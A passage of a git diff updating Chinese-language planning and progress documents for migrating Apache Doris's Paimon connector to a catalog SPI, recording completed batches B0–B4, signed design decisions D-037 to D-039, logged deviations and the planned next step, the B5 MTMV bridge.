doc B5→B9 续。**B4 未提交**(工作树 = 仅 B4 改动)。 +- **live e2e(真实 paimon 各 flavor 环境)= 翻闸真正完成门**(CI 跳)。**B4 新增 live-e2e 硬门**:① `buildTableDescriptor`→HIVE_TABLE 在 BE 真 paimon 普通表+sys 表(离线只到连接器边界,[DV-024]);② MVCC SDK-delegation(`CatalogBackedPaimonCatalogOps` DataTable cast / `earlierOrEqualTimeMills` / `tryGetSnapshot`,离线仅 fake);③ binlog/audit_log 真走 JNI(forceJni 端到端)+ snapshots/schemas sys 表查询;④ sys 表 time-travel fail-loud(须 B5 接活 scan-params/snapshot 后)。累计前批 live 门见 tasks/P5 §当前阻塞项。 +- **B5 最高 correctness 风险**:MTMV 单-pin 不变式(snapshotId 与分区集同源);`lastFileCreationTime()` 跨 flavor 可靠性(SDK 行为,源码不可验,须 live)。 +- auto-memory:[[catalog-spi-p5-paimon-design]](设计)、[[catalog-spi-p5-b1-design]](B1)、[[catalog-spi-p5-b2-design]](B2)、[[catalog-spi-p5-b3-design]](B3)、[[catalog-spi-p5-b4-design]](B4:D-039 E7 机制 + T20 inert + BLOCKER + DV-024)、[[catalog-spi-connector-session-tz-gotcha]](含 paimon 例外)。 diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index bf2d46b4faf532..a6a9b6f842ca25 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-06-09** | 当前阶段:**P4 maxcompute 完成 ✅(已合入),P5 paimon recon+设计完成(D-037/D-038 已签字,待分批实现)**——P4 full-adopter 迁移 + live 翻闸 + legacy 删除全部完成并合入 `branch-catalog-spi`:**#64253**(T01–T06 连接器全适配 + `CatalogFactory.SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,fe-core 依赖树**彻底无 odps**,HEAD `e96037cf6aa`);upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI 并随 #64300 合入。前序 P0/P1/P2(#63582/#63641/#64096)+ P3 hybrid(#64143)均已合入。**P5 paimon recon+设计完成 2026-06-09**(recon `research/p5-paimon-migration-recon.md` + 设计 `tasks/P5-paimon-migration.md`,30 TODO/B0–B9;D-037 flavor=单 Catalog、D-038 MTMV/MVCC P5 内实现 已签字;下一步分批实现,B0/B1/B6 可先行)。| 项目总进度:**~33%**(按 §一 进度条加权:P0+P1+P2+P4 满 + P3 hybrid 45% + P5 设计 ~5%,约 8.0/25 周) +> 最后更新:**2026-06-10** | 当前阶段:**P4 maxcompute 完成 ✅(已合入),P5 paimon B0–B4 已落地(测基建/flavor/normal-read/DDL/sys-tables+MVCC;下一 = B5 MTMV 桥)**——P4 full-adopter 迁移 + live 翻闸 + legacy 删除全部完成并合入 `branch-catalog-spi`:**#64253**(T01–T06 连接器全适配 + `CatalogFactory.SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,fe-core 依赖树**彻底无 odps**,HEAD `e96037cf6aa`);upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI 并随 #64300 合入。前序 P0/P1/P2(#63582/#63641/#64096)+ P3 hybrid(#64143)均已合入。**P5 paimon B0–B4 已落地 2026-06-10**(recon+设计 2026-06-09;B0 测基建 / B1 flavor 装配 / B2 normal-read / B3 DDL metadata / B4 sys-tables E7 + MVCC E5;签字 D-037/D-038/D7/**D-039**(E7=live SysTable 机制非 RFC §10);连接器 124 绿 + fe-core PluginDriven*Test 100 绿、checkstyle/import-gate 0、**未提交**;下一 = B5 MTMV 桥,翻闸 B7 gated on B5+live-e2e)。| 项目总进度:**~33%**(按 §一 进度条加权:P0+P1+P2+P4 满 + P3 hybrid 45% + P5 设计 ~5%,约 8.0/25 周) > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -14,12 +14,12 @@ | **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 已合入 `branch-catalog-spi`(#64096,squash `0793f032662`;T12 回归推迟 DV-003)| [tasks/P2](./tasks/P2-trino-connector-migration.md) | | P3 | hudi 迁移 | 2 周 | ▰▰▰▰▰▱▱▱▱▱ 45% | ✅ hybrid(D-019)批 A–D 已合入 `branch-catalog-spi`(**#64143** squash `5c240dc7a34`);批 E(live cutover)并入 P7 | [tasks/P3](./tasks/P3-hudi-migration.md) | | **P4** | maxcompute 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成并合入 `branch-catalog-spi`(**#64253** T01–T06 适配+翻闸 + **#64300** T07–T09 删 legacy/odps-free;含 #64119 校验迁移)| [tasks/P4](./tasks/P4-maxcompute-migration.md) | -| **P5** | paimon 迁移 | 3 周 | ▰▱▱▱▱▱▱▱▱▱ 5% | 🚧 **recon+设计完成**(D-037/D-038 已签字;待分批实现 B0–B9)| [tasks/P5](./tasks/P5-paimon-migration.md) + [recon](./research/p5-paimon-migration-recon.md) | +| **P5** | paimon 迁移 | 3 周 | ▰▰▰▰▱▱▱▱▱▱ 45% | 🚧 **B0–B4 已落地**(测基建/flavor/normal-read/DDL/sys-tables+MVCC;D-037/D-038/D7/D-039 签字,未提交);下一 = B5 MTMV 桥;翻闸 B7 gated on B5 + live-e2e | [tasks/P5](./tasks/P5-paimon-migration.md) + [recon](./research/p5-paimon-migration-recon.md) | | P6 | iceberg 迁移 | 5 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P8 | 收尾清理 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | -**全局进度:~32%**(25 周计划中已完成约 7.9 周:P0+P1+P2+P4 满 + P3 hybrid 45%;统一 header 与本行此前不一致的 38%/12% 旧值,改按 §一 进度条加权) +**全局进度:~34%**(25 周计划中已完成约 8.5 周:P0+P1+P2+P4 满 + P3 hybrid 45% + P5 45%;按 §一 进度条加权) --- @@ -34,7 +34,7 @@ | trino-connector | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/trino-connector.md) | | hudi | 🟡(D-005 区分符 + D-020 模型 dispatch 已设计;实现批 E)| 🟨 55%(读路径 dormant + 批 C 测试基线)| ❌(gate 关)| ❌ | 0/0(寄生 hms)| **25%** | [详情](./connectors/hudi.md) | | maxcompute | ✅ | ✅ 100% | ✅ **已合入 #64253** | ✅ **#64300 已删** | ✅ 0/0 | **100%** | [详情](./connectors/maxcompute.md) | -| paimon | ✅(设计定稿 D-037/D-038)| 🟨 50%(read 骨架;DDL/sys/MVCC/MTMV 待)| ❌(gate 关)| ❌ | 0/10 | **25%** | [详情](./connectors/paimon.md) | +| paimon | ✅(D-037/D-038/D-039)| 🟨 70%(read+DDL+sys-tables+MVCC连接器侧;MTMV桥 B5 待)| ❌(gate 关)| ❌ | 0/10 | **45%** | [详情](./connectors/paimon.md) | | iceberg | 🟡 | 🟥 10% | ❌ | ❌ | 0/19 | **5%** | [详情](./connectors/iceberg.md) | | hive (+hms) | 🟡 | 🟥 20% | ❌ | ❌ | 0/31 | **10%** | [详情](./connectors/hive.md) | @@ -44,7 +44,7 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 -### P5 — paimon 迁移(🚧 recon+设计完成 2026-06-09,D-037/D-038 已签字,待分批实现) +### P5 — paimon 迁移(🚧 B0–B4 已落地 2026-06-10,D-037/D-038/D7/D-039 已签字;下一 = B5 MTMV 桥) > 策略 = **full adopter + 翻闸**(复用 P4 样板,非 P3 hybrid)。recon `research/p5-paimon-migration-recon.md` + 设计 `tasks/P5-paimon-migration.md`(30 TODO / B0–B9 批 + old→new 映射 + 批次依赖图)。覆盖 5 功能区:普通读/系统表/procedure/DDL/mtmv。 > @@ -149,6 +149,7 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-06-10(实现里程碑 · P5 B0–B4)** ✅ **P5 paimon B0–B4 已落地**(连接器+fe-core,**未提交**,用户控时机):B0 测基建+parity baseline / B1 flavor 装配(全 5 flavor) / B2 normal-read / B3 DDL metadata / **B4 sys-tables E7 + MVCC E5(本 session,T16-T20)**。B4 = subagent-driven(understand workflow 纠偏 2 处 → 用户签 **D-039**「E7 复用 live `SysTableResolver` 机制,非 RFC §10」[DV-023];T20 MVCC inert until B5)+ 5 dispatch(implement→双审→fix-loop)+ 3-lens final holistic(PARITY/SCOPE READY + 1 ADVERSARIAL BLOCKER「`PluginDrivenScanNode.create` 绕 seam 丢 forceJni→binlog/audit_log 静默错行」**已修**)。另核出并修 B2 遗留缺陷 [DV-024](普通 paimon plugin 表 BE 描述符 SCHEMA_TABLE→应 HIVE_TABLE)。**验证**:连接器 124/0/0/1 绿、fe-core PluginDriven*Test 100 绿、checkstyle/import-gate 0、无 cutover/B5 泄漏、唯一 fe-connector-api 改动=T16 两 default no-op。**下一 = B5 MTMV 桥**(接活 E5:`PluginDrivenExternalTable`→MvccTable + `beginQuerySnapshot` 调用 + `ConnectorMvccSnapshotAdapter` 构造)。 - **2026-06-09(设计里程碑 · P5 kickoff)** ✅ **P5 paimon recon + 设计完成**(0 产线代码):14-agent code-grounded recon + cross-cut 对抗复审,产 [recon](./research/p5-paimon-migration-recon.md)(5 功能区旧实现 + E1–E10 SPI 状态 + 跨切面风险 + MC 一致性 11 约定)+ [设计 doc](./tasks/P5-paimon-migration.md)(old→new 映射 + 30 TODO/B0–B9 + 验收 + 批次依赖图)。**用户签字 D-037**(flavor=单 Catalog + `createCatalog` switch,**非** backend 模块)/ **D-038**(MTMV/MVCC 桥 P5 内实现,翻闸 gated on B5,禁静默读 latest)。**证伪 3 先验**:backend 模块空壳(连接器走单 Catalog stub)、FE 分发部分已预接(残留=连接器 listPartitions)、Base64 非 blocker(BE 有 STD fallback)。procedure 区=零可迁 doc-only(expire_snapshots=iceberg、CALL migrate_table=Spark 两假阳性)。**下一 = B0 测试基建 + parity baseline 起分批实现**。 - **2026-06-09(阶段里程碑 · P4 完成)** ✅ **P4 maxcompute 迁移全部完成并合入 `branch-catalog-spi`** —— **#64253**(T01–T06 连接器 full 适配 + live 翻闸 `SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core legacy 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,`fe-core dependency:tree | grep odps`=∅,HEAD `e96037cf6aa`)。upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI(`validateMaxComputeConnection`/`checkOperationSupported`,连接器 UT 101/0/0/1)并随 #64300 squash 合入(`git log -S` 证)。fe-core **彻底无 odps**(代码 + 依赖树)。本 session = 交接文档同步(PROGRESS + HANDOFF 第 19 次),0 产线代码;**下一 session = P5 paimon 迁移 kickoff**(recon + 设计 + 批次计划,复用 P4 full-adopter 写 SPI 样板)。 - **2026-06-06(实现 ⑧·P4-T05)** ✅ **P4 Batch C 启动 — P4-T05 翻闸接线完成**(dormant、gate-green、**待 commit**,用户定时机):GsonUtils 三 GSON 注册(catalog `:397` / **db `:452`** / table `:472`)atomic 迁 `registerCompatibleSubtype`→`PluginDriven*` + 删 3 unused `maxcompute.*` import;`PluginDrivenExternalTable.getEngine`/`getEngineTableTypeName` 加 `case "max_compute"`(返 `MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()`=null / `.name()`,**核 legacy 行为等价**);`legacyLogTypeToCatalogType` 仅加注释(默认分支已出 `"max_compute"`,不加 case)。**关键校正**:ordered TODO 漏 **db `:452`**——4-agent 对抗复核揪出,漏迁则翻闸后 `MaxComputeExternalDatabase.buildTableInternal:44` cast `PluginDrivenExternalCatalog`→`MaxComputeExternalCatalog` 抛 `ClassCastException`(es/jdbc/trino 均 catalog+db+table 齐迁,legacy DB 类已删);用户签字折入 T05。**复核另 2 告警判非问题**:`getMetaCacheEngine`→"default" 假阳性(plugin 路径经连接器 `initSchema` 取 schema、走 "default" 桶同 es/jdbc/trino,`MaxComputeExternalMetaCache` 仅 legacy 表引用=Batch-D 死码);`getMysqlType`→"BASE TABLE" 同 ES 既定行为(`ES_EXTERNAL_TABLE` 亦不在 `toMysqlType` switch,迁后同样 null→"BASE TABLE" 已 ship);dormancy 告警=既载中间态 caveat(其"留 registerSubtype"修法错=撞 duplicate-label IAE)。UT `PluginDrivenExternalTableEngineTest` +2 max_compute 例(9/9)。守门全绿(fe-core compile BUILD SUCCESS + checkstyle 0 + import-gate 0 + UT 9-0-0,真实 EXIT 核验)。详见设计 §3.4 / [D-026 校正]。**下一 = T06a(写接线 W-a..d + 静态分区/overwrite 绑定 + R-004 隔离 UT,dormant)→ T06b(flip)**。⚠️ T05↔flip 中间态不可部署(compat 已注册但 factory 仍 legacy)。 @@ -213,8 +214,8 @@ | 类型 | 总数 | 最新条目 | 文档 | |---|---|---|---| -| **决策**(D-NNN) | 38 | D-038(P5-D2 paimon MTMV/MVCC 桥 P5 内实现,翻闸 gated);D-037(P5-D1 paimon flavor=单 Catalog + switch);D-036(P4-T06e FIX-CAST-PUSHDOWN)| [decisions-log.md](./decisions-log.md) | -| **偏差**(DV-NNN) | 22 | DV-022(P4-T09 fe-common 去 odps 暴露隐藏传递依赖→显式补 netty/protobuf);DV-021(Batch-D 删后 4 条 Tier-3 接受项 GAP3/4/9/10)| [deviations-log.md](./deviations-log.md) | +| **决策**(D-NNN) | 39 | D-039(P5-D8 paimon B4 E7=复用 live SysTable 机制,非 RFC §10);D-038(P5-D2 MTMV/MVCC 桥 P5 内实现);D-037(P5-D1 flavor=单 Catalog)| [decisions-log.md](./decisions-log.md) | +| **偏差**(DV-NNN) | 24 | DV-024(P5-B4 修 B2 遗留:普通 paimon plugin 表 BE 描述符 SCHEMA_TABLE→HIVE_TABLE);DV-023(RFC §10 E7 设计被 P5-B4 取代);DV-022(P4-T09 fe-common 去 odps)| [deviations-log.md](./deviations-log.md) | | **风险**(R-NNN) | 14 | R-014(thrift sink 选择灵活性) | [risks.md](./risks.md) | --- @@ -223,9 +224,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:**P5 paimon recon + 设计(0 产线代码)** —— 14-agent code-grounded recon + cross-cut 对抗复审,产 `research/p5-paimon-migration-recon.md`(5 功能区旧实现 + E1–E10 SPI 状态 + 跨切面 + MC 一致性 11 约定)+ `tasks/P5-paimon-migration.md`(old→new 映射 + 30 TODO/B0–B9 + 验收);用户签字 **D-037**(flavor=单 Catalog)/ **D-038**(MTMV/MVCC P5 内实现)。同步 connectors/paimon.md(修 3 stale 表述)+ decisions-log(+D-037/D-038)+ 本 PROGRESS + HANDOFF(覆盖)。 -- **下一个 session 应做**:**P5 分批实现** —— 从 **B0**(连接器测试模块 + no-mockito seam + parity baseline + pin paimon-core 版本)起,并行 **B6**(procedure doc no-op);继 **B1**(单 Catalog flavor 装配 + 每-flavor authenticator)→ B2/B3 → B4(E7 sys-table + E5 MVCC)→ B5(MTMV 桥)→ B7 翻闸(gated)→ B8 删 legacy → B9 回归。详见 [tasks/P5](./tasks/P5-paimon-migration.md) 批次依赖图。 -- **是否需要 handoff**:**是**——本场已**覆盖** rewrite [HANDOFF.md](./HANDOFF.md)(P5 recon+设计完成 + D-037/D-038 + 下一步 B0–B9)。 +- **本 session 已完成**:**P5 paimon B4(sys-tables E7 + MVCC E5,T16-T20,连接器+fe-core,未提交)** —— understand workflow(6-agent)纠偏 2 处 → 用户签 **D-039**(E7 复用 live SysTable 机制非 RFC §10)+ T20 留 B4(inert until B5);subagent-driven 5 dispatch(implement→双审→fix-loop)+ 3-lens final holistic(PARITY/SCOPE READY + 1 ADVERSARIAL BLOCKER `PluginDrivenScanNode.create` 绕 seam 丢 forceJni **已修**);另修 B2 遗留缺陷 [DV-024]。验证:连接器 124 绿、fe-core 100 绿、checkstyle/import-gate 0。同步 decisions-log(+D-039) + deviations-log(+DV-023/DV-024) + RFC §10 脚注 + tasks/P5 + 本 PROGRESS + connectors/paimon + HANDOFF(覆盖)+ auto-memory。 +- **下一个 session 应做**:**B5 MTMV 桥**(gated on B4,现满足)—— T21 GAP-LISTPART-AT-SNAPSHOT / T22 fe-core `PaimonPluginDrivenExternalTable` implements MTMVRelatedTableIf+MTMVBaseTableIf+MvccTable + `loadSnapshot` / T23 子类 MTMV 方法 / T24 rehome `PaimonMvccSnapshot` / T25 isPartitionInvalid parity。**关键**:B5 须把 B4 inert 的 E5 接活(调 `beginQuerySnapshot` + 构造 `ConnectorMvccSnapshotAdapter` + 接 scan-params/snapshot 到 `PluginDrivenScanNode` 令 T19 sys-guard 生效)。**B6**(procedure doc no-op)可穿插。继 B7 翻闸(gated on B5+live-e2e)→ B8 删 legacy → B9 回归。详见 [tasks/P5](./tasks/P5-paimon-migration.md) 批次依赖图。 +- **是否需要 handoff**:**是**——本场已**覆盖** rewrite [HANDOFF.md](./HANDOFF.md)(P5 B4 完成 + D-039 + 下一步 B5)。 - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- diff --git a/plan-doc/connectors/paimon.md b/plan-doc/connectors/paimon.md index 67b3d160467972..181e2903737b61 100644 --- a/plan-doc/connectors/paimon.md +++ b/plan-doc/connectors/paimon.md @@ -10,9 +10,9 @@ | **fe-connector 模块** | `fe/fe-connector/fe-connector-paimon/` | | **fe-core 旧路径** | `fe/fe-core/src/main/java/org/apache/doris/datasource/paimon/` | | **共享依赖** | `fe-connector-hms`(paimon-HMS-flavor 用) | -| **计划迁移阶段** | **P5**(recon+设计完成 2026-06-09,待分批实现)| -| **当前状态** | 🟡 设计完成;D-037/D-038 已签字;待 B0→B9 实现 | -| **完成度** | 25%(连接器 scan/predicate/handle 骨架;DDL/sys-table/MVCC/MTMV 全待迁)| +| **计划迁移阶段** | **P5**(B0–B4 已落地 2026-06-10,未提交;下一 = B5 MTMV 桥)| +| **当前状态** | 🚧 B0–B4 完成(测基建/flavor/normal-read/DDL/sys-tables+MVCC 连接器侧);D-037/D-038/D7/D-039 签字;B5 MTMV 桥 待 | +| **完成度** | 70%(连接器侧 read+DDL+sys-tables(E7)+MVCC(E5) 全实现 + fe-core 通用 sys 机制;MTMV 桥(B5)+翻闸(B7)+删 legacy(B8)+回归(B9) 待)| | **主 owner** | @morningman / TBD | --- @@ -44,12 +44,12 @@ | E2 Procedures | ❌ 不需要 | **零可迁**:fe-core 无 paimon procedure(expire_snapshots=iceberg、CALL migrate_table=Spark,皆非 paimon)| doc-only no-op | | E3 MetaInvalidator | 🟡 | paimon-HMS-flavor 需要 | 复用 `fe-connector-hms` | | E4 Transactions | ✅ 需要 | | -| E5 MvccSnapshot | ✅ 需要 | `PaimonMvccSnapshot` 待迁 SPI | | +| E5 MvccSnapshot | ✅ 需要 | **B4 连接器侧已实现**(`beginQuerySnapshot/getSnapshotAt/getSnapshotById` + caps;**inert until B5** wires fe-core MvccTable 消费方)| 首个 E5 消费者 | | E6 VendedCredentials | ✅ 需要 | `PaimonVendedCredentialsProvider` 待迁 | | -| E7 SysTables | ✅ 需要 | `PaimonSysExternalTable` 待迁 | | +| E7 SysTables | ✅ 需要 | **B4 已实现**(D-039:复用 live `SysTableResolver` 机制,非 RFC §10 [DV-023]):连接器 `listSupportedSysTables`+`getSysTableHandle`;fe-core 通用 `PluginDrivenSysExternalTable`+`PluginDrivenSysTable`(报 PLUGIN_EXTERNAL_TABLE);forceJni binlog/audit_log;`buildTableDescriptor`→HIVE_TABLE | greenfield SPI,未来 iceberg/hudi 复用 | | E8 ColumnStatistics | 🟡 | snapshot summary 已含部分 | 可选 | | E9 Delete/Merge sink | 🟡 | merge-on-read 路径 | | -| E10 listPartitions | ✅ 需要 | **连接器侧未实现**(FE 分发已预接 PLUGIN_EXTERNAL_TABLE,残留缺口是连接器 `listPartitions*`)| | +| E10 listPartitions | ✅ 需要 | **B2 连接器侧已实现**(`listPartitionNames/listPartitions/listPartitionValues`);FE 消费 + `partition_columns` key 翻 = B5 前置 | | | **MTMV(无 E 号)** | ✅ 需要 | **SPI 完全无面(须新增 + fe-core `PaimonPluginDrivenExternalTable` 桥)**;paimon 是唯一带 MTMV 的 adopter | D-038(P5 内实现)| --- @@ -69,14 +69,19 @@ - 阶段 task:[tasks/P5-paimon-migration.md](../tasks/P5-paimon-migration.md)(30 TODO / B0–B9 批) - recon:[research/p5-paimon-migration-recon.md](../research/p5-paimon-migration-recon.md) -- 决策:D-037(flavor=单 Catalog + switch)、D-038(MTMV/MVCC P5 内实现,翻闸 gated)、D-006(cache 放连接器内)、D-005(HMS flavor 走 tableFormatType) -- 偏差:(暂无) +- 决策:D-037(flavor=单 Catalog + switch)、D-038(MTMV/MVCC P5 内实现,翻闸 gated)、**D-039**(B4 E7=复用 live SysTable 机制非 RFC §10)、D7(B3 DDL authenticator=legacy parity)、D-006(cache 放连接器内)、D-005(HMS flavor 走 tableFormatType) +- 偏差:**DV-023**(RFC §10 E7 设计被 B4 取代)、**DV-024**(B4 修 B2 遗留 BE 描述符 SCHEMA_TABLE→HIVE_TABLE) - 风险:R-004(classloader)、R-007(FE/BE 共享 jar)、R-012(snapshotId 类型) --- ## 进度日志 +### 2026-06-10(B0–B4 实现里程碑,未提交) +- **B4(本 session,T16-T20)= sys-tables E7 + MVCC E5**:连接器 SPI `listSupportedSysTables`/`getSysTableHandle`(D-039 复用 live `SysTableResolver` 机制);fe-core 通用 `PluginDrivenSysExternalTable`/`PluginDrivenSysTable`;forceJni(binlog/audit_log);`buildTableDescriptor`→HIVE_TABLE(同修 B2 遗留 [DV-024]);sys 表 fail-loud 拒 time-travel/scan-params;E5 三方法(inert until B5)+ caps。3-lens 复审 1 BLOCKER(scan-path 丢 forceJni)已修。连接器 124 绿 + fe-core 100 绿。 +- B0–B3 此前已落(测基建 / flavor 装配 / normal-read / DDL metadata;见 tasks/P5 阶段日志)。 +- 下一 = B5 MTMV 桥(接活 E5 + GAP-LISTPART-AT-SNAPSHOT + `partition_columns` key 翻 + FE 消费 listPartitions)。 + ### 2026-06-09 - P5 kickoff:14-agent code-grounded recon + cross-cut 对抗复审;产 recon + 设计 doc(30 TODO/B0–B9)。 - 用户签字 D-037(flavor=单 Catalog + switch)、D-038(MTMV/MVCC P5 内实现,翻闸 gated on 它)。 diff --git a/plan-doc/decisions-log.md b/plan-doc/decisions-log.md index 7d1575b5c5124e..d37bd3352b40d3 100644 --- a/plan-doc/decisions-log.md +++ b/plan-doc/decisions-log.md @@ -15,6 +15,7 @@ | 编号 | 别名 | 简述 | 日期 | 状态 | |---|---|---|---|---| +| D-039 | P5-D8 | **P5 paimon B4 E7 sys-table SPI 形状 = 复用 live fe-core SysTable 机制(用户签字,2026-06-10)**:RFC §10 的「sys-table 当 `$`-后缀普通表、连接器在 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」设计**从未落地**——live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(`BindRelation`/`DescribeCommand`/`ShowCreateTableCommand` 调用;iceberg + legacy-paimon 共用),RFC §10 已 stale。**用户定 = 复用 live 机制(非 RFC §10)**:① 连接器 SPI 加 `ConnectorTableOps.listSupportedSysTables` + `getSysTableHandle`(default no-op,MC/jdbc/es/trino 不受影响);② fe-core `PluginDrivenExternalTable.getSupportedSysTables` 委托连接器(`listSupportedSysTables`),通用 `PluginDrivenSysTable extends NativeSysTable` + `PluginDrivenSysExternalTable`(**报 `PLUGIN_EXTERNAL_TABLE` 非连接器类型**,经现有 `SysTableResolver` 路由到 `PluginDrivenScanNode`)。否决 RFC §10 的 `getTableHandle("$suffix")`-路由(须改 `BindRelation`/`RelationUtil`、大 surface、偏离 iceberg)。RFC §10 标 superseded([DV-023](./deviations-log.md))。**T20(E5 MVCC)置于 B4** = 连接器侧 groundwork(inert until B5 wires fe-core MvccTable 消费者;翻闸 gated on B5 故 inert capability 不达用户,安全)。设计 `tasks/P5-paimon-migration.md` §批次 B4 | 2026-06-10 | ✅ | | D-038 | P5-D2 | **P5 paimon MTMV + MVCC(时间旅行) scope = P5 内实现桥,翻闸 gated on 它(用户签字,design-only)**:SPI 当前 **MTMV 完全无面(E10 缺)**(`PluginDrivenExternalTable:62` 不 implements MTMVRelatedTableIf/MTMVBaseTableIf/MvccTable,框架靠 `instanceof MTMVRelatedTableIf` 分发——`MTMVPartitionUtil:265/497/588`、`StatementContext:987/1003`),E5(MVCC) `defined-no-consumer`(`ConnectorMvccSnapshotAdapter` 仅自身文件引用、`ConnectorScanRange` 无 snapshot 字段)。legacy `PaimonExternalTable:74` 实现全套。翻闸不机械阻断(plain SELECT 经 `getPaimonTable(empty)` 取 latest)但按 MC 样板直接翻闸=**静默回归** paimon-as-MTMV-base + 时间旅行。**用户定 = 方案 A**:P5 内落 fe-core `PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` 实现三接口 + 首个真 E5 消费者 override `beginQuerySnapshot` 三方法 + 新增 GAP-LISTPART-AT-SNAPSHOT 的 at-snapshot listPartitions;表级 staleness=`ConnectorMvccSnapshot.getSnapshotId()`(-1 空表)、分区级=`ConnectorPartitionInfo.getLastModifiedMillis()`(已存在);MTMV 类型/PartitionItem 留 fe-core、连接器仅供 SPI-neutral 数据。**翻闸(B7) gated on MTMV 桥(B5)**;**禁**静默读 latest。否决 B(翻闸先行 + MTMV fail-loud 延后)。最高 correctness 风险=单-pin 不变式 + `lastFileCreationTime()` 跨 flavor 可靠性(SDK 行为,须 live 验)。设计 `tasks/P5-paimon-migration.md` §开放决策 D2 + recon §3.5/§4 | 2026-06-09 | ✅ | | D-037 | P5-D1 | **P5 paimon flavor(hms/filesystem/dlf/rest/jdbc) 装配 = 单 Catalog + `createCatalog` flavor switch(MC 一致,用户签字,design-only)**:连接器现走单 Catalog stub(`PaimonConnector.createCatalog:75-83` 把 `Options.fromMap` 直喂 paimon SDK CatalogFactory,无 Doris 侧 warehouse/HiveConf/StorageProperties/authenticator 装配);5 个 `fe-connector-paimon-backend-*` 模块**是空壳**(仅 gitignore `.flattened-pom.xml`、零 src/未注册 Maven 模块)。legacy 装配在 fe-core `AbstractPaimonProperties`+5 子类+`PaimonPropertiesFactory`,全 import 禁用的 fe-core `StorageProperties`/`HMSBaseProperties`/`HadoopExecutionAuthenticator`。**用户定 = 方案 A**:`PaimonConnector.createCatalog` 内 switch on `paimon.catalog.type`,**拷** warehouse/conf/S3-normalize + 重建 Hadoop/HiveConf + **每-flavor ExecutionAuthenticator** 入模块(镜像 MC 拷 MCProperties→MCConnectorProperties;filesystem→hms→rest/jdbc/dlf 渐进)。**不**建 backend 模块 + ServiceLoader(否决 B:无 MC 先例、大 surface、空壳从零建)。约束:StorageProperties 从属性 map 重建(禁 import);**每-flavor authenticator 必须保**(否则 Kerberized HMS/HDFS DDL 运行时炸、无离线测覆盖)。设计 `tasks/P5-paimon-migration.md` §开放决策 D1 + recon §3.4 | 2026-06-09 | ✅ | | D-036 | — | **P4-T06e FIX-CAST-PUSHDOWN MaxCompute 关 CAST 谓词下推 + 剥壳时抑制 source LIMIT(F9 静默丢行回归,review 原误判 known-degr 已推翻)**:共享 converter 无条件剥 CAST(`ExprToConnectorExpressionConverter:108`)、MaxCompute 不 override `supportsCastPredicatePushdown`(继承默认 true)→ `buildRemainingFilter` 不剔除含 CAST 的 conjunct → 剥壳谓词推入 ODPS read session(`CAST(str AS INT)=5`→源过滤 `str="5"` 按列 STRING quote)→ 源端 under-match 丢 `'05'/' 5'`、BE 复算只能过滤超集向下无法找回 → **静默丢行**。legacy `convertSlotRefToColumnName` 对 CAST 操作数抛异常→caught→丢弃该谓词(BE-only)→正确 ⇒ cutover 比 legacy 严格更紧 = **回归**(区别于 [DV-016] 仅 limit-opt 资格 CAST-unwrap、非丢行)。**对抗核验 `wzoa6dkvw` 0/3 refuted、verdict=real-unregistered-regression**。**用户定 Fix**。修 = ① 连接器 `MaxComputeConnectorMetadata.supportsCastPredicatePushdown→false`(激活既有 strip 路径、CAST conjunct 保留 BE-only、恢复 legacy parity;镜像 JDBC + `ConnectorPushdownOps` doc 处方;无 SPI 变更、无新路径);② fe-core `getSplits` 在 CAST conjunct 被剥(`filteredToOriginalIndex!=null`)时抑制 source LIMIT 下推(抽纯静态 `effectiveSourceLimit`)——否则连接器收空 filter→limit-opt(ON 时) row-offset 读首 N 行无谓词→BE under-return(impl-review `wj2h0120n` F9-LIMITOPT-1 折入;`startSplit` 批路径已恒 -1[DEC-1] 故只改 getSplits)。守门:连接器 UT 2/2+mutation(false→true 红)、fe-core LimitStrip 2/2+BatchMode 9/9+mutation 2/2 向红、checkstyle 0、import-gate 净。真值闸=live ODPS CAST(str)=5 返回全集(DV-020,CI 跳)。out-of-scope surface:JDBC `applyLimit`+cast-off 理论同类(MC 不 override applyLimit、本修对 MC 完整)。commit `cc32521ed99` | 2026-06-08 | ✅ | diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index e88790ffce3825..d2d5e20a4327ec 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,12 @@ ## 📋 索引 -> 时间倒序;当前共 **22** 项。 +> 时间倒序;当前共 **24** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 